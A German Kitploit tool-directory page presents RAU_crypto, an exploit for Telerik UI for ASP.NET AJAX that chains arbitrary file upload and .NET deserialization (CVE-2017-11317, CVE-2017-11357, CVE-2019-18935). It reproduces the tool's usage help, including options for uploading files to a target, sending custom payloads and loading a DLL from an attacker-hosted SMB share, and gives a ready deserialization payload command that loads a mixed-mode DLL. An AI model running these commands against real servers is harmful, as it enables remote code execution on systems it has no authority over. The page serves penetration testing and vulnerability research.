Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
RAU_crypto — Telerik UI for ASP.NET AJAX Dateiupload- und .NET-Deserialisierungs-Exploit (CVE-2017-11317, CVE-2017-11357, CVE-2019-18935) | Kitploit
Tools/GitHubGitHub/bao7uo/rau_crypto
Verschlüsselungs-/EntschlüsselungstoolsPayload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstests
GitHubbao7uo/rau_crypto

RAU_crypto

Telerik UI for ASP.NET AJAX Dateiupload- und .NET-Deserialisierungs-Exploit (CVE-2017-11317, CVE-2017-11357, CVE-2019-18935)

Repository anzeigen
18050vor 6 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

RAU_crypto

Language

Kombinierter Exploit für Telerik UI für ASP.NET AJAX.

  • Datei-Upload für CVE-2017-11317 und CVE-2017-11357 – lädt die Datei automatisch hoch
  • .NET-Deserialisierung für CVE-2019-18935

Unterstützt nun das Testen der Fähigkeit des Ziels, Remote-Payloads von einem angreifergehosteten SMB-Dienst abzurufen. Verwenden Sie Burp Collaborator und/oder Responder, um zu testen, ob die erforderlichen Voraussetzungen erfüllt sind.

Damit der Exploit funktioniert, benötigen Sie im Allgemeinen eine Version mit fest codierten Schlüsseln, oder Sie müssen den Schlüssel kennen, z. B. wenn Sie den Inhalt der web.config offenlegen können. Der Exploit ermöglicht außerdem die einfache Entschlüsselung und Verschlüsselung der rauPostData, die mit Telerik.Web.UI.WebResource.axd?type=rau verwendet werden.

Anforderungen

  • Python >= 3.6 mit pycryptodome (https://www.pycryptodome.org/en/latest/src/installation.html) – Installation mit pip3 install pycryptodome oder pip3 install pycryptodomex

Veröffentlicht auf exploit-db (alte Version)

  • https://www.exploit-db.com/exploits/43874/

Siehe auch

Mein anderer Telerik-UI-Exploit (für CVE-2017-9248) dürfte ebenfalls von Interesse sein. Er ist hier verfügbar:

  • https://github.com/bao7uo/dp_crypto

Offene Aufgaben

  • Fehlende HMAC-Funktionalität für spätere Versionen.
  • Möglichkeit, einen benutzerdefinierten Schlüssel anzugeben.
  • Befehlszeilenargument für die Ausführung einer Mixed-Mode-DLL (verwenden Sie in der Zwischenzeit das unten angegebene Beispiel für .NET-Deserialisierungs-Payloads).
  • Befehlszeilenargumente zum Testen der Fähigkeit und zum Laden von remote (SMB) gehosteten Mixed-Mode-DLLs
  • Separates Dienstprogramm zum Testen von Mixed-Mode-DLLs.
  • Quellcode-/Kompilierungsanweisungen für Mixed-Mode-DLL bereitstellen.
  • Brute-Force-Versionen.

Hinweis: Die letzten vier Punkte sind abgeschlossen, aber nicht veröffentlicht.

Schwachstellen

Die Schwachstelle beim Datei-Upload (CVE-2017-11317) wurde von anderen entdeckt; die Anerkennung gebührt meines Erachtens @straight_blast @pwntester @olekmirosh. Kurz nach der Ankündigung stieß ich im Rahmen meiner Arbeit auf die Telerik-Bibliothek, also recherchierte ich die Schwachstelle und schrieb diesen Exploit im Juli 2017. Ich meldete außerdem CVE-2017-11357 für die damit zusammenhängende unsichere direkte Objektreferenz.

https://www.telerik.com/support/kb/aspnet-ajax/upload-%28async%29/details/insecure-direct-object-reference

Die Schwachstelle in der .NET-Deserialisierung (CVE-2019-18935) wurde von @mwulftange entdeckt.

https://www.telerik.com/support/kb/aspnet-ajax/details/allows-javascriptserializer-deserialization

Verwendung

root@kitploit:~
$ ./RAU_crypto.py -h

RAU_crypto by Paul Taylor / @bao7uo 
CVE-2017-11317, CVE-2019-18935 - Telerik RadAsyncUpload hardcoded keys / arbitrary file upload / .NET deserialisation

Usage:

Decrypt a ciphertext:               -d ciphertext
Decrypt rauPostData:                -D rauPostData
Encrypt a plaintext:                -e plaintext

Generate file upload rauPostData:   -E c:\\destination\\folder Version
Generate all file upload POST data: -p c:\\destination\\folder Version ../local/filename
Upload file:                        -P c:\\destination\\folder Version c:\\local\\filename url [proxy]

Generate custom payload POST data : -c partA partB
Send custom payload:                -C partA partB url [proxy]

Check remote SMB payload capability -r lhost url [proxy]

Load remote SMB dll payload         -R lhost/share/mixed_mode_assembly.dll url [proxy]\n\n" +
Trigger local uploaded dll payload  -L c:/users/public/documents/mixed_mode_assembly.dll url [proxy]\n\n" +

Example URL:               http://target/Telerik.Web.UI.WebResource.axd?type=rau
Example Version:           2016.2.504
Example optional proxy:    127.0.0.1:8080

N.B. Advanced settings e.g. custom keys or PBKDB algorithm can be found by searching source code for: ADVANCED_SETTINGS

$

Beispiel – Entschlüsselung

Screenshot der Entschlüsselung

Beispiel – beliebiger Datei-Upload

Screenshot des Uploads

Benutzerdefiniertes Payload (.NET-Deserialisierung)

Details zu benutzerdefinierten Payloads für die .NET-Deserialisierung finden Sie in einem großartigen Artikel von @mwulftange, der diese Schwachstelle entdeckt hat, im Code-White-Blog unter dem folgenden Link.

  • https://codewhitesec.blogspot.com/2019/02/telerik-revisited.html

Update: Es gibt einen alternativen Exploit von Caleb Gross @noperator, der Funktionen dieses Exploits übernimmt, mit einem großartigen Blogartikel, der alles erklärt. Dank auch an Caleb für seinen Beitrag zu RAU_Crypto.

  • https://know.bishopfox.com/research/cve-2019-18935-remote-code-execution-in-telerik-ui

Weitere relevante Links.

  • https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-JSON-Attacks-wp.pdf
  • https://threatvector.cylance.com/en_us/home/implications-of-loading-net-assemblies.html
  • https://thewover.github.io/Mixed-Assemblies/

Beispiel für .NET-Deserialisierungs-Payload:

root@kitploit:~
$ ./RAU_crypto.py -C '{"Path":"file:///c:/users/public/documents/mixedmode64.dll"}' 'System.Configuration.Install.AssemblyInstaller, System.Configuration.Install, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a' http://target/Telerik.Web.UI.WebResource.axd?type=rau

Für Mixed-Mode-DLLs siehe mein anderes GitHub-Repository:

  • https://github.com/bao7uo/MixedUp

Besonderer Dank an @irsdl, der die Funktion für benutzerdefinierte Payloads inspiriert hat.

Dank an @rwincey, der die Remote-DLL-Funktion inspiriert hat.

Tool herunterladen